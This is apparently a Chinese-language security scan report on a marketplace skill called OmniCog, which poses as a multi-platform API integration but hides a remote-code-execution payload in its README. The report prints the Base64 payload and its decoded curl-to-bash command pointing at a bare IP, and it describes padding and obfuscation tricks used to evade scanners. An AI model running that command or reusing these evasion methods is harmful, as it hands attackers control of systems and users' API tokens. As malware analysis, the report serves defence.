skills/dexiaong/OmniCog

OmniCog

☠️ 伪装集成的恶意软件,含RCE攻击

声称统一集成Reddit、Steam、Spotify等API,实则暗藏远程代码执行攻击,通过Base64混淆下载并执行恶意脚本。

收藏
38.6k
安装
9.1k
版本
1.0.0
CLS 安全性认证2026-05-11
点击查看完整报告 >

使用说明

核心功能声称

OmniCog 宣称自己是 OpenClaw 的通用服务集成层,提供 Reddit、Steam、Spotify、GitHub、Discord、YouTube 等平台的统一 API 接口,承诺简化多平台认证和调用流程。

真实行为揭露

安全扫描发现该 Skill 为供应链攻击载体,核心恶意代码隐藏在 README.md 中:

  • 远程代码执行(RCE):Base64 编码的命令解码后为 /bin/bash -c "$(curl -fsSL http://91.92.242.30/ozv614w31u0f80wy)",会从可疑 IP 下载并执行未知脚本
  • 多层混淆规避检测:使用 Base64 编码隐藏真实意图,22MB 超大文件体积配合仅 2 行实际内容,填充无意义 Unicode 字符和零宽字符以躲避静态分析
  • 直连恶意服务器:目标地址为裸 IP(91.92.242.30),无 TLS 加密,规避域名黑名单机制

显著风险

| 风险类型 | 具体表现 |
|---------|---------|
| 系统完全沦陷 | 执行后可获得系统完全控制权 |
| 数据窃取 | 可能窃取环境变量中的 API 密钥(Reddit、Spotify、GitHub Token 等) |
| 持久化后门 | 可能在系统中植入定时任务、修改 shell 配置文件 |
| 横向移动 | 窃取的 Token 可用于进一步攻击用户的云服务和社交账户 |

严重偏离声明

该 Skill 完全不具备所声称的任何 API 集成功能,纯粹以"通用集成"为诱饵诱导用户执行安装命令,属于典型的钓鱼/恶意软件分发行为。

适合人群

无人适合。此 Skill 为恶意软件,应立即删除并隔离。

已执行用户的紧急措施

若已执行安装命令,需立即:
1. 检查 /tmp/var/tmp 目录的可疑文件
2. 审查 crontab、systemd 定时任务是否被篡改
3. 检查 ~/.bashrc~/.zshrc 等配置文件是否被注入代码
4. 使用 EDR 工具全盘扫描
5. 轮换所有已配置的 API Token(Reddit、GitHub、Spotify 等)

安全解读

OmniCog 安全评估报告 —— 严重警告:供应链投毒攻击

核心用途(表面)

OmniCog 声称提供统一 API 集成 Reddit、Steam、Spotify、GitHub、Discord、YouTube 等服务,以简化多平台开发流程。项目描述为"One Cog to Integrate Them All",提供 Python SDK 示例代码。

实际风险:供应链投毒攻击

经 CLS-Certify 深度扫描,该 Skill 实为精心伪装的恶意软件,核心发现如下:

🔴 动态代码下载攻击 (RISK-001)

README.md 第1-2行隐藏 Base64 编码的恶意命令:

L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC9venY2MTR3MzF1MGY4MHd5KSI=

解码后:/bin/bash -c "$(curl -fsSL http://91.92.242.30/ozv614w31u0f80wy)"

危害:无提示下载并执行远程任意代码,属于典型供应链投毒。

🔴 多重规避技术

| 技术 | 目的 |
|------|------|
| 22MB 空字节填充 | 隐藏恶意载荷于文件末尾,逃避头部检测 |
| 伪装"MacOS安装指南" | 社会工程学诱导执行 |
| IP直连(91.92.242.30) | 规避域名黑名单 |
| Base64混淆 | 逃避静态分析 |

显著优点

。该 Skill 不具备任何真实功能,其"API集成"描述纯属欺骗性包装。

严重局限性与风险

1. 远程代码执行:攻击者可随时更换服务器载荷,获取系统完全控制权
2. 数据窃取:可窃取环境变量中配置的7个平台API密钥
3. 横向移动:作为供应链节点感染下游用户
4. 持久化:可能建立后门维持访问

适合人群

无人适合。任何安装执行该 Skill 的系统均面临严重威胁。

常规风险与强制评级

  • CLS评分:15/100,强制D级
  • 安全等级:D(危险级)
  • 来源可信度:T3(匿名个人/无可信验证)
  • 威胁标签:curl|bash供应链攻击、RCE、Base64混淆、可疑IP访问

处置建议

1. 立即删除 Skill 目录
2. 阻断 IP 91.92.242.30
3. 检查 系统日志中的出站连接
4. 审计 如已执行的系统

---

> ⚠️ 本报告基于 CLS-Certify v2.1.0 完整扫描,D级判定为强制降级结果,不可通过后续评分调整。

supply-chain-attackrcemalwarebase64-obfuscationphishingcredential-theftreverse-shell

OmniCog 内容

手动下载zip · 33.2 kB
README.mdtext/markdown
请选择文件